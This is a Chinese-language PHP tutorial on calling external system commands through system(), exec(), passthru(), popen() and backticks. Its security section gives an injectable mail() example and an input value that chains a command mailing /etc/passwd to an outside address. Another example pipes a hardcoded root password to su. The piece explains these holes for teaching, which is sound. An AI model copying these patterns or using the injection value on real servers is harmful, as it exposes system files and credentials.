首頁 > 後端開發 > php教程 > 在PHP中執行系統外部指令

在PHP中執行系統外部指令

PHPz
發布: 2019-02-12 11:43:10
原創
2438 人瀏覽過

PHP作為一種伺服器端的腳本語言,象編寫簡單,或是複雜的動態網頁這樣的任務,它完全能夠勝任。但事情不總是如此,有時為了實現某個功能,必須藉助於作業系統的外部程式(或稱為命令),這樣可以做到事半功倍。

那麼,是否可以在PHP腳本中呼叫外部指令呢?如果能,如何去做呢?有些什麼方面的顧慮呢?相信你看了這篇文章後,一定能夠回答這些問題了。

是否可以?

答案是肯定的。 PHP和它的程式設計語言一樣,完全可以在程式內呼叫外部命令,而且是很簡單的:只要用一個或幾個函數即可。

前提條件

由於PHP基本上是用於WEB程式開發的,所以安全性成了人們考慮的一個重要面向。於是PHP的設計者們為PHP加了一個門:安全模式。如果運行在安全模式下,那麼PHP腳本將受到以下四個方面的限制:

執行外部命令

在開啟檔案時有些限制

連接MySQL資料庫

基於HTTP的認證

在安全模式下,只有在特定目錄中的外部程式才可以被執行,對其它程式的呼叫將被拒絕。這個目錄可以在php.ini檔中用safe_mode_exec_dir指令,或是在編譯PHP是加上--with-exec-dir選項來指定,預設是/usr/local/php/bin。

如果你呼叫一個應該可以輸出結果的外部指令(意思是PHP腳本沒有錯誤),得到的卻是一片空白,那麼很可能你的網管已經把PHP運行在安全模式下了。

如何做?

在PHP中呼叫外部指令,可以用以下三種方法來實現:

1) 用PHP提供的專門函數

PHP提供共了3個專門的執行外部指令的函數:system(),exec(),passthru()。

system()

原型:string system (string command [, int return_var])

system()函數很其它語言中的差不多,它執行給定的命令,輸出和返回結果。第二個參數是可選的,用來得到指令執行後的狀態碼。

範例:

<?system("/usr/local/bin/webalizer/webalizer");?>
exec()
登入後複製

原型:string exec (string command [, string array [, int return_var]])

exec()函數與system()相似,也執行給定的命令,但不輸出結果,而是傳回結果的最後一行。雖然它只會傳回指令結果的最後一行,但用第二個參數array可以得到完整的結果,方法是把結果逐行追加到array的結尾處。所以如果array不是空的,在呼叫之前最好用unset()最它清除。只有指定了第二個參數時,才可以用第三個參數,用來取得指令執行的狀態碼。

範例:

<?
exec("/bin/ls -l");
exec("/bin/ls -l", $res);
#$res是一个数据,每个元素代表结果的一行
exec("/bin/ls -l", $res, $rc);
#$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0
?>
登入後複製

passthru()

原型:void passthru (string command [, int return_var])

passthru()只呼叫🎜>

passthru()。命令,不回傳任何結果,但把命令的運行結果原樣直接輸出到標準輸出設備上。所以passthru()函數常用來呼叫象pbmplus(Unix下的一個處理圖片的工具,輸出二進位的原始圖片的流)這樣的程式。同樣它也可以得到指令執行的狀態碼。

範例:
<?
header("Content-type: image/gif");
passthru("./ppmtogif hunte.ppm");
?>
登入後複製

2) 用popen()函數開啟進程

上面的方法只能簡單執行指令,卻不能與指令互動。但有些時候必須向指令輸入一些東西,如在增加Linux的系統使用者時,要呼叫su來把目前使用者換到root才行,而su指令必須要在指令列上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。

popen()函數開啟一個進程管道來執行給定的命令,傳回一個檔案句柄。既然回傳的是一個檔案句柄,那麼就可以對它讀和寫了。在PHP3中,對此句柄只能做單一的操作模式,要麼寫,要麼讀;從PHP4開始,可以同時讀和寫了。除非這個句柄是以一種模式(讀取或寫入)打開的,否則必須呼叫pclose()函數來關閉它。

範例1:
<?
$fp=popen("/bin/ls -l", "r");
?>
登入後複製

範例2(本例來自PHP中國聯盟網站http://www.phpx.com/show.php?d=col&i=51):

/* PHP中如何增加一個系統用戶

下面是一段例程,增加一個名字為james的用戶,

root密碼是verygood。僅供參考
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s \"%s %s\"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
登入後複製

3) 用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)

這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇號把要執行的指令括起來當作一個表達式,這個表達式的值就是指令執行的結果。如:
<?
$res=`/bin/ls -l`;
echo &#39;<b><pre class="brush:php;toolbar:false">&#39;.$res.&#39;
'; ?>
登入後複製

這個腳本的輸出就像:

hunte.gif

hunte.ppm

jpg.htm< >jpg.jpg

passthru.php

要考慮些什麼?

要考慮兩個問題:安全性和超時。

先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样:

<?
system("mail $to < products.txt");
echo "我们的产品目录已经发送到你的信箱:$to";
?>
登入後複製

用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址:

&#39;--bla ; mail someone@domain.com < /etc/passwd ;&#39;
登入後複製

那么这条命令最终变成:

&#39;mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt&#39;
登入後複製

我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。

幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。

再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:

<?
system("/usr/local/bin/order_proc > /tmp/null &");
?>
登入後複製



相關標籤:
php
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板